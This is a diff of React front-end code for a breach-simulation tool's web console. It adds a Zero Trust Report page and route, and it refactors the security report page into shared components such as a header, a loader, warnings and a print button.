"d3": "^5.11.0",
|
||||||
"downloadjs": "^1.4.7",
|
"downloadjs": "^1.4.7",
|
||||||
"fetch": "^1.1.0",
|
"fetch": "^1.1.0",
|
||||||
|
"file-saver": "^2.0.2",
|
||||||
"filepond": "^4.2.0",
|
"filepond": "^4.2.0",
|
||||||
"js-file-download": "^0.4.4",
|
"js-file-download": "^0.4.4",
|
||||||
"json-loader": "^0.5.7",
|
"json-loader": "^0.5.7",
|
||||||
|
@ -84,6 +88,7 @@
|
||||||
"react-bootstrap": "^0.32.4",
|
"react-bootstrap": "^0.32.4",
|
||||||
"react-copy-to-clipboard": "^5.0.1",
|
"react-copy-to-clipboard": "^5.0.1",
|
||||||
"react-data-components": "^1.2.0",
|
"react-data-components": "^1.2.0",
|
||||||
|
"react-desktop-notification": "^1.0.9",
|
||||||
"react-dimensions": "^1.3.0",
|
"react-dimensions": "^1.3.0",
|
||||||
"react-dom": "^16.5.2",
|
"react-dom": "^16.5.2",
|
||||||
"react-fa": "^5.0.0",
|
"react-fa": "^5.0.0",
|
||||||
|
@ -93,14 +98,13 @@
|
||||||
"react-jsonschema-form": "^1.0.5",
|
"react-jsonschema-form": "^1.0.5",
|
||||||
"react-redux": "^5.1.1",
|
"react-redux": "^5.1.1",
|
||||||
"react-router-dom": "^4.3.1",
|
"react-router-dom": "^4.3.1",
|
||||||
|
"react-spinners": "^0.5.4",
|
||||||
"react-table": "^6.8.6",
|
"react-table": "^6.8.6",
|
||||||
"react-toggle": "^4.0.1",
|
"react-toggle": "^4.0.1",
|
||||||
"react-tooltip-lite": "^1.9.1",
|
"react-tooltip-lite": "^1.9.1",
|
||||||
"redux": "^4.0.0",
|
"redux": "^4.0.0",
|
||||||
"sass-loader": "^7.1.0",
|
"sass-loader": "^7.1.0",
|
||||||
"sha3": "^2.0.0",
|
"sha3": "^2.0.0",
|
||||||
"react-spinners": "^0.5.4",
|
"pluralize": "^7.0.0"
|
||||||
"@emotion/core": "^10.0.10",
|
|
||||||
"react-desktop-notification": "^1.0.9"
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -7,10 +7,10 @@ import RunServerPage from 'components/pages/RunServerPage';
|
||||||
import ConfigurePage from 'components/pages/ConfigurePage';
|
import ConfigurePage from 'components/pages/ConfigurePage';
|
||||||
import RunMonkeyPage from 'components/pages/RunMonkeyPage';
|
import RunMonkeyPage from 'components/pages/RunMonkeyPage';
|
||||||
import MapPage from 'components/pages/MapPage';
|
import MapPage from 'components/pages/MapPage';
|
||||||
import PassTheHashMapPage from 'components/pages/PassTheHashMapPage';
|
|
||||||
import TelemetryPage from 'components/pages/TelemetryPage';
|
import TelemetryPage from 'components/pages/TelemetryPage';
|
||||||
import StartOverPage from 'components/pages/StartOverPage';
|
import StartOverPage from 'components/pages/StartOverPage';
|
||||||
import ReportPage from 'components/pages/ReportPage';
|
import ReportPage from 'components/pages/ReportPage';
|
||||||
|
import ZeroTrustReportPage from 'components/pages/ZeroTrustReportPage';
|
||||||
import LicensePage from 'components/pages/LicensePage';
|
import LicensePage from 'components/pages/LicensePage';
|
||||||
import AuthComponent from 'components/AuthComponent';
|
import AuthComponent from 'components/AuthComponent';
|
||||||
import LoginPageComponent from 'components/pages/LoginPage';
|
import LoginPageComponent from 'components/pages/LoginPage';
|
||||||
|
@ -29,6 +29,8 @@ let infectionMonkeyImage = require('../images/infection-monkey.svg');
|
||||||
let guardicoreLogoImage = require('../images/guardicore-logo.png');
|
let guardicoreLogoImage = require('../images/guardicore-logo.png');
|
||||||
let notificationIcon = require('../images/notification-logo-512x512.png');
|
let notificationIcon = require('../images/notification-logo-512x512.png');
|
||||||
|
|
||||||
|
const reportZeroTrustRoute = '/report/zero_trust';
|
||||||
|
|
||||||
class AppComponent extends AuthComponent {
|
class AppComponent extends AuthComponent {
|
||||||
updateStatus = () => {
|
updateStatus = () => {
|
||||||
this.auth.loggedIn()
|
this.auth.loggedIn()
|
||||||
|
@ -148,7 +150,7 @@ class AppComponent extends AuthComponent {
|
||||||
</NavLink>
|
</NavLink>
|
||||||
</li>
|
</li>
|
||||||
<li>
|
<li>
|
||||||
<NavLink to="/report">
|
<NavLink to="/report/security">
|
||||||
<span className="number">4.</span>
|
<span className="number">4.</span>
|
||||||
Security Report
|
Security Report
|
||||||
{this.state.completedSteps.report_done ?
|
{this.state.completedSteps.report_done ?
|
||||||
|
@ -156,6 +158,15 @@ class AppComponent extends AuthComponent {
|
||||||
: ''}
|
: ''}
|
||||||
</NavLink>
|
</NavLink>
|
||||||
</li>
|
</li>
|
||||||
|
<li>
|
||||||
|
<NavLink to="/report/zero_trust">
|
||||||
|
<span className="number">5.</span>
|
||||||
|
Zero Trust Report
|
||||||
|
{this.state.completedSteps.report_done ?
|
||||||
|
<Icon name="check" className="pull-right checkmark text-success"/>
|
||||||
|
: ''}
|
||||||
|
</NavLink>
|
||||||
|
</li>
|
||||||
<li>
|
<li>
|
||||||
<NavLink to="/start-over">
|
<NavLink to="/start-over">
|
||||||
<span className="number"><i className="fa fa-undo" style={{'marginLeft': '-1px'}}/></span>
|
<span className="number"><i className="fa fa-undo" style={{'marginLeft': '-1px'}}/></span>
|
||||||
|
@ -190,7 +201,8 @@ class AppComponent extends AuthComponent {
|
||||||
{this.renderRoute('/infection/map', <MapPage onStatusChange={this.updateStatus}/>)}
|
{this.renderRoute('/infection/map', <MapPage onStatusChange={this.updateStatus}/>)}
|
||||||
{this.renderRoute('/infection/telemetry', <TelemetryPage onStatusChange={this.updateStatus}/>)}
|
{this.renderRoute('/infection/telemetry', <TelemetryPage onStatusChange={this.updateStatus}/>)}
|
||||||
{this.renderRoute('/start-over', <StartOverPage onStatusChange={this.updateStatus}/>)}
|
{this.renderRoute('/start-over', <StartOverPage onStatusChange={this.updateStatus}/>)}
|
||||||
{this.renderRoute('/report', <ReportPage onStatusChange={this.updateStatus}/>)}
|
{this.renderRoute('/report/security', <ReportPage onStatusChange={this.updateStatus}/>)}
|
||||||
|
{this.renderRoute(reportZeroTrustRoute, <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
|
||||||
{this.renderRoute('/license', <LicensePage onStatusChange={this.updateStatus}/>)}
|
{this.renderRoute('/license', <LicensePage onStatusChange={this.updateStatus}/>)}
|
||||||
</Col>
|
</Col>
|
||||||
</Row>
|
</Row>
|
||||||
|
@ -200,10 +212,11 @@ class AppComponent extends AuthComponent {
|
||||||
}
|
}
|
||||||
|
|
||||||
showInfectionDoneNotification() {
|
showInfectionDoneNotification() {
|
||||||
if (this.state.completedSteps.infection_done) {
|
if (this.shouldShowNotification()) {
|
||||||
let hostname = window.location.hostname;
|
const hostname = window.location.hostname;
|
||||||
let url = `https://${hostname}:5000/report`;
|
const port = window.location.port;
|
||||||
console.log("Trying to show notification. URL: " + url + " | icon: " + notificationIcon);
|
const protocol = window.location.protocol;
|
||||||
|
const url = `${protocol}//${hostname}:${port}${reportZeroTrustRoute}`;
|
||||||
|
|
||||||
Notifier.start(
|
Notifier.start(
|
||||||
"Monkey Island",
|
"Monkey Island",
|
||||||
|
@ -212,6 +225,11 @@ class AppComponent extends AuthComponent {
|
||||||
notificationIcon);
|
notificationIcon);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
shouldShowNotification() {
|
||||||
|
// No need to show the notification to redirect to the report if we're already in the report page
|
||||||
|
return (this.state.completedSteps.infection_done && !window.location.pathname.startsWith("/report"));
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
AppComponent.defaultProps = {};
|
AppComponent.defaultProps = {};
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
import React from 'react';
|
import React from 'react';
|
||||||
import '../../../styles/Collapse.scss'
|
import '../../../styles/Collapse.scss'
|
||||||
import '../../report-components/StolenPasswords'
|
import '../../report-components/security/StolenPasswords'
|
||||||
import StolenPasswordsComponent from "../../report-components/StolenPasswords";
|
import StolenPasswordsComponent from "../../report-components/security/StolenPasswords";
|
||||||
import {ScanStatus} from "./Helpers"
|
import {ScanStatus} from "./Helpers"
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,20 +1,27 @@
|
||||||
import React from 'react';
|
import React, {Fragment} from 'react';
|
||||||
import {Button, Col} from 'react-bootstrap';
|
import {Button, Col} from 'react-bootstrap';
|
||||||
import BreachedServers from 'components/report-components/BreachedServers';
|
import BreachedServers from 'components/report-components/security/BreachedServers';
|
||||||
import ScannedServers from 'components/report-components/ScannedServers';
|
import ScannedServers from 'components/report-components/security/ScannedServers';
|
||||||
import PostBreach from 'components/report-components/PostBreach';
|
import PostBreach from 'components/report-components/security/PostBreach';
|
||||||
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
|
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
|
||||||
import {edgeGroupToColor, options} from 'components/map/MapOptions';
|
import {edgeGroupToColor, options} from 'components/map/MapOptions';
|
||||||
import StolenPasswords from 'components/report-components/StolenPasswords';
|
import StolenPasswords from 'components/report-components/security/StolenPasswords';
|
||||||
import CollapsibleWellComponent from 'components/report-components/CollapsibleWell';
|
import CollapsibleWellComponent from 'components/report-components/security/CollapsibleWell';
|
||||||
import {Line} from 'rc-progress';
|
import {Line} from 'rc-progress';
|
||||||
import AuthComponent from '../AuthComponent';
|
import AuthComponent from '../AuthComponent';
|
||||||
import PassTheHashMapPageComponent from "./PassTheHashMapPage";
|
import PassTheHashMapPageComponent from "./PassTheHashMapPage";
|
||||||
import StrongUsers from "components/report-components/StrongUsers";
|
import StrongUsers from "components/report-components/security/StrongUsers";
|
||||||
import AttackReport from "components/report-components/AttackReport";
|
import AttackReport from "components/report-components/security/AttackReport";
|
||||||
|
import ReportHeader, {ReportTypes} from "../report-components/common/ReportHeader";
|
||||||
|
import MonkeysStillAliveWarning from "../report-components/common/MonkeysStillAliveWarning";
|
||||||
|
import ReportLoader from "../report-components/common/ReportLoader";
|
||||||
|
import MustRunMonkeyWarning from "../report-components/common/MustRunMonkeyWarning";
|
||||||
|
import SecurityIssuesGlance from "../report-components/common/SecurityIssuesGlance";
|
||||||
|
import PrintReportButton from "../report-components/common/PrintReportButton";
|
||||||
|
import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";
|
||||||
|
|
||||||
let guardicoreLogoImage = require('../../images/guardicore-logo.png');
|
let guardicoreLogoImage = require('../../images/guardicore-logo.png');
|
||||||
let monkeyLogoImage = require('../../images/monkey-icon.svg');
|
|
||||||
|
|
||||||
class ReportPageComponent extends AuthComponent {
|
class ReportPageComponent extends AuthComponent {
|
||||||
|
|
||||||
|
@ -66,18 +73,11 @@ class ReportPageComponent extends AuthComponent {
|
||||||
|
|
||||||
render() {
|
render() {
|
||||||
let content;
|
let content;
|
||||||
if (Object.keys(this.state.report).length === 0) {
|
|
||||||
if (this.state.runStarted) {
|
if (this.state.runStarted) {
|
||||||
content = (<h1>Generating Report...</h1>);
|
|
||||||
} else {
|
|
||||||
content =
|
|
||||||
<p className="alert alert-warning">
|
|
||||||
<i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
|
|
||||||
You have to run a monkey before generating a report!
|
|
||||||
</p>;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
content = this.generateReportContent();
|
content = this.generateReportContent();
|
||||||
|
} else {
|
||||||
|
content = <MustRunMonkeyWarning/>;
|
||||||
}
|
}
|
||||||
|
|
||||||
return (
|
return (
|
||||||
|
@ -90,15 +90,15 @@ class ReportPageComponent extends AuthComponent {
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
stillLoadingDataFromServer() {
|
||||||
|
return Object.keys(this.state.report).length === 0;
|
||||||
|
}
|
||||||
|
|
||||||
updateMonkeysRunning = () => {
|
updateMonkeysRunning = () => {
|
||||||
return this.authFetch('/api')
|
return this.authFetch('/api')
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
// This check is used to prevent unnecessary re-rendering
|
this.setState(extractExecutionStatusFromServerResponse(res));
|
||||||
this.setState({
|
|
||||||
allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']),
|
|
||||||
runStarted: res['completed_steps']['run_monkey']
|
|
||||||
});
|
|
||||||
return res;
|
return res;
|
||||||
});
|
});
|
||||||
};
|
};
|
||||||
|
@ -117,7 +117,7 @@ class ReportPageComponent extends AuthComponent {
|
||||||
|
|
||||||
getReportFromServer(res) {
|
getReportFromServer(res) {
|
||||||
if (res['completed_steps']['run_monkey']) {
|
if (res['completed_steps']['run_monkey']) {
|
||||||
this.authFetch('/api/report')
|
this.authFetch('/api/report/security')
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
this.setState({
|
this.setState({
|
||||||
|
@ -128,49 +128,36 @@ class ReportPageComponent extends AuthComponent {
|
||||||
}
|
}
|
||||||
|
|
||||||
generateReportContent() {
|
generateReportContent() {
|
||||||
|
let content;
|
||||||
|
|
||||||
|
if (this.stillLoadingDataFromServer()) {
|
||||||
|
content = <ReportLoader loading={true}/>;
|
||||||
|
} else {
|
||||||
|
content =
|
||||||
|
<div>
|
||||||
|
{this.generateReportOverviewSection()}
|
||||||
|
{this.generateReportFindingsSection()}
|
||||||
|
{this.generateReportRecommendationsSection()}
|
||||||
|
{this.generateReportGlanceSection()}
|
||||||
|
{this.generateAttackSection()}
|
||||||
|
{this.generateReportFooter()}
|
||||||
|
</div>;
|
||||||
|
}
|
||||||
|
|
||||||
return (
|
return (
|
||||||
<div>
|
<Fragment>
|
||||||
<div className="text-center no-print" style={{marginBottom: '20px'}}>
|
<div style={{marginBottom: '20px'}}>
|
||||||
<Button bsSize="large" onClick={() => {
|
<PrintReportButton onClick={() => {print();}} />
|
||||||
print();
|
|
||||||
}}><i className="glyphicon glyphicon-print"/> Print Report</Button>
|
|
||||||
</div>
|
</div>
|
||||||
<div className="report-page">
|
<div className="report-page">
|
||||||
{this.generateReportHeader()}
|
<ReportHeader report_type={ReportTypes.security}/>
|
||||||
<hr/>
|
<hr/>
|
||||||
{this.generateReportOverviewSection()}
|
{content}
|
||||||
{this.generateReportFindingsSection()}
|
|
||||||
{this.generateReportRecommendationsSection()}
|
|
||||||
{this.generateReportGlanceSection()}
|
|
||||||
{this.generateAttackSection()}
|
|
||||||
{this.generateReportFooter()}
|
|
||||||
</div>
|
</div>
|
||||||
<div className="text-center no-print" style={{marginTop: '20px'}}>
|
<div style={{marginTop: '20px'}}>
|
||||||
<Button bsSize="large" onClick={() => {
|
<PrintReportButton onClick={() => {print();}} />
|
||||||
print();
|
|
||||||
}}><i className="glyphicon glyphicon-print"/> Print Report</Button>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</Fragment>
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
generateReportHeader() {
|
|
||||||
return (
|
|
||||||
<div id="header" className="row justify-content-between">
|
|
||||||
<Col xs={8}>
|
|
||||||
<div>
|
|
||||||
<h1 style={{marginTop: '0px', marginBottom: '5px', color: '#666666', fontFamily: 'Alegreya'}}>Security Report</h1>
|
|
||||||
<h1 style={{marginTop: '0px', marginBottom: '0px', color: '#ffcc00', fontFamily: 'Alegreya'}}>Infection <b>Monkey</b></h1>
|
|
||||||
</div>
|
|
||||||
</Col>
|
|
||||||
<Col xs={4}>
|
|
||||||
<img src={monkeyLogoImage}
|
|
||||||
style={{
|
|
||||||
float: 'right',
|
|
||||||
width: '80px'
|
|
||||||
}}/>
|
|
||||||
</Col>
|
|
||||||
</div>
|
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -180,27 +167,8 @@ class ReportPageComponent extends AuthComponent {
|
||||||
<h2>
|
<h2>
|
||||||
Overview
|
Overview
|
||||||
</h2>
|
</h2>
|
||||||
{
|
<SecurityIssuesGlance issuesFound={this.state.report.glance.exploited.length > 0}/>
|
||||||
this.state.report.glance.exploited.length > 0 ?
|
<MonkeysStillAliveWarning allMonkeysAreDead={this.state.allMonkeysAreDead}/>
|
||||||
(<p className="alert alert-danger">
|
|
||||||
<i className="glyphicon glyphicon-exclamation-sign" style={{'marginRight': '5px'}}/>
|
|
||||||
Critical security issues were detected!
|
|
||||||
</p>) :
|
|
||||||
(<p className="alert alert-success">
|
|
||||||
<i className="glyphicon glyphicon-ok-sign" style={{'marginRight': '5px'}}/>
|
|
||||||
No critical security issues were detected.
|
|
||||||
</p>)
|
|
||||||
}
|
|
||||||
{
|
|
||||||
this.state.allMonkeysAreDead ?
|
|
||||||
''
|
|
||||||
:
|
|
||||||
(<p className="alert alert-warning">
|
|
||||||
<i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
|
|
||||||
Some monkeys are still running. To get the best report it's best to wait for all of them to finish
|
|
||||||
running.
|
|
||||||
</p>)
|
|
||||||
}
|
|
||||||
{
|
{
|
||||||
this.state.report.glance.exploited.length > 0 ?
|
this.state.report.glance.exploited.length > 0 ?
|
||||||
''
|
''
|
||||||
|
|
|
@ -0,0 +1,134 @@
|
||||||
|
import React, {Fragment} from 'react';
|
||||||
|
import {Col} from 'react-bootstrap';
|
||||||
|
import AuthComponent from '../AuthComponent';
|
||||||
|
import ReportHeader, {ReportTypes} from "../report-components/common/ReportHeader";
|
||||||
|
import ReportLoader from "../report-components/common/ReportLoader";
|
||||||
|
import MustRunMonkeyWarning from "../report-components/common/MustRunMonkeyWarning";
|
||||||
|
import PrintReportButton from "../report-components/common/PrintReportButton";
|
||||||
|
import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";
|
||||||
|
import SummarySection from "../report-components/zerotrust/SummarySection";
|
||||||
|
import FindingsSection from "../report-components/zerotrust/FindingsSection";
|
||||||
|
import PrinciplesSection from "../report-components/zerotrust/PrinciplesSection";
|
||||||
|
|
||||||
|
class ZeroTrustReportPageComponent extends AuthComponent {
|
||||||
|
|
||||||
|
constructor(props) {
|
||||||
|
super(props);
|
||||||
|
|
||||||
|
this.state = {
|
||||||
|
allMonkeysAreDead: false,
|
||||||
|
runStarted: true
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
componentDidMount() {
|
||||||
|
this.updatePageState();
|
||||||
|
const refreshInterval = setInterval(this.updatePageState, 8000);
|
||||||
|
this.setState(
|
||||||
|
{refreshDataIntervalHandler: refreshInterval}
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
componentWillUnmount() {
|
||||||
|
clearInterval(this.state.refreshDataIntervalHandler);
|
||||||
|
}
|
||||||
|
|
||||||
|
updateMonkeysRunning = () => {
|
||||||
|
return this.authFetch('/api')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
this.setState(extractExecutionStatusFromServerResponse(res));
|
||||||
|
return res;
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
updatePageState = () => {
|
||||||
|
this.updateMonkeysRunning().then(res => this.getZeroTrustReportFromServer(res));
|
||||||
|
};
|
||||||
|
|
||||||
|
render() {
|
||||||
|
let content;
|
||||||
|
if (this.state.runStarted) {
|
||||||
|
content = this.generateReportContent();
|
||||||
|
} else {
|
||||||
|
content = <MustRunMonkeyWarning/>;
|
||||||
|
}
|
||||||
|
|
||||||
|
return (
|
||||||
|
<Col xs={12} lg={10}>
|
||||||
|
<h1 className="page-title no-print">5. Zero Trust Report</h1>
|
||||||
|
<div style={{'fontSize': '1.2em'}}>
|
||||||
|
{content}
|
||||||
|
</div>
|
||||||
|
</Col>
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
generateReportContent() {
|
||||||
|
let content;
|
||||||
|
|
||||||
|
if (this.stillLoadingDataFromServer()) {
|
||||||
|
content = <ReportLoader loading={true}/>;
|
||||||
|
} else {
|
||||||
|
content = <div id="MainContentSection">
|
||||||
|
<SummarySection allMonkeysAreDead={this.state.allMonkeysAreDead} pillars={this.state.pillars}/>
|
||||||
|
<PrinciplesSection principles={this.state.principles}
|
||||||
|
pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
|
||||||
|
<FindingsSection pillarsToStatuses={this.state.pillars.pillarsToStatuses} findings={this.state.findings}/>
|
||||||
|
</div>;
|
||||||
|
}
|
||||||
|
|
||||||
|
return (
|
||||||
|
<Fragment>
|
||||||
|
<div style={{marginBottom: '20px'}}>
|
||||||
|
<PrintReportButton onClick={() => {
|
||||||
|
print();
|
||||||
|
}}/>
|
||||||
|
</div>
|
||||||
|
<div className="report-page">
|
||||||
|
<ReportHeader report_type={ReportTypes.zeroTrust}/>
|
||||||
|
<hr/>
|
||||||
|
{content}
|
||||||
|
</div>
|
||||||
|
<div style={{marginTop: '20px'}}>
|
||||||
|
<PrintReportButton onClick={() => {
|
||||||
|
print();
|
||||||
|
}}/>
|
||||||
|
</div>
|
||||||
|
</Fragment>
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
stillLoadingDataFromServer() {
|
||||||
|
return typeof this.state.findings === "undefined"
|
||||||
|
|| typeof this.state.pillars === "undefined"
|
||||||
|
|| typeof this.state.principles === "undefined";
|
||||||
|
}
|
||||||
|
|
||||||
|
getZeroTrustReportFromServer() {
|
||||||
|
let res;
|
||||||
|
this.authFetch('/api/report/zero_trust/findings')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
this.setState({
|
||||||
|
findings: res
|
||||||
|
});
|
||||||
|
});
|
||||||
|
this.authFetch('/api/report/zero_trust/principles')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
this.setState({
|
||||||
|
principles: res
|
||||||
|
});
|
||||||
|
});
|
||||||
|
this.authFetch('/api/report/zero_trust/pillars')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
this.setState({
|
||||||
|
pillars: res
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export default ZeroTrustReportPageComponent;
|
|
@ -0,0 +1,6 @@
|
||||||
|
export function extractExecutionStatusFromServerResponse(res) {
|
||||||
|
return {
|
||||||
|
allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']),
|
||||||
|
runStarted: res['completed_steps']['run_monkey']
|
||||||
|
};
|
||||||
|
}
|
|
@ -0,0 +1,21 @@
|
||||||
|
import React, {Component} from "react";
|
||||||
|
import * as PropTypes from "prop-types";
|
||||||
|
|
||||||
|
export default class MonkeysStillAliveWarning extends Component {
|
||||||
|
render() {
|
||||||
|
return <div>
|
||||||
|
{
|
||||||
|
this.props.allMonkeysAreDead ?
|
||||||
|
''
|
||||||
|
:
|
||||||
|
(<p className="alert alert-warning">
|
||||||
|
<i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
|
||||||
|
Some monkeys are still running. To get the best report it's best to wait for all of them to finish
|
||||||
|
running.
|
||||||
|
</p>)
|
||||||
|
}
|
||||||
|
</div>
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
MonkeysStillAliveWarning.propTypes = {allMonkeysAreDead: PropTypes.bool};
|
|
@ -0,0 +1,11 @@
|
||||||
|
import React, {Component} from "react";
|
||||||
|
import {NavLink} from "react-router-dom";
|
||||||
|
|
||||||
|
export default class MustRunMonkeyWarning extends Component {
|
||||||
|
render() {
|
||||||
|
return <p className="alert alert-warning">
|
||||||
|
<i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
|
||||||
|
<b>You have to <NavLink to="/run-monkey">run a monkey</NavLink> before generating a report!</b>
|
||||||
|
</p>
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,36 @@
|
||||||
|
import React, {Component} from "react";
|
||||||
|
import ReactTable from "react-table";
|
||||||
|
import * as PropTypes from "prop-types";
|
||||||
|
|
||||||
|
class PaginatedTable extends Component {
|
||||||
|
render() {
|
||||||
|
if (this.props.data.length > 0) {
|
||||||
|
let defaultPageSize = this.props.data.length > this.props.pageSize ? this.props.pageSize : this.props.data.length;
|
||||||
|
let showPagination = this.props.data.length > this.props.pageSize;
|
||||||
|
|
||||||
|
return (
|
||||||
|
<div>
|
||||||
|
<ReactTable
|
||||||
|
columns={this.props.columns}
|
||||||
|
data={this.props.data}
|
||||||
|
showPagination={showPagination}
|
||||||
|
defaultPageSize={defaultPageSize}
|
||||||
|
/>
|
||||||
|
</div>
|
||||||
|
);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return (
|
||||||
|
<div/>
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export default PaginatedTable;
|
||||||
|
|
||||||
|
PaginatedTable.propTypes = {
|
||||||
|
data: PropTypes.array,
|
||||||
|
columns: PropTypes.array,
|
||||||
|
pageSize: PropTypes.number,
|
||||||
|
};
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue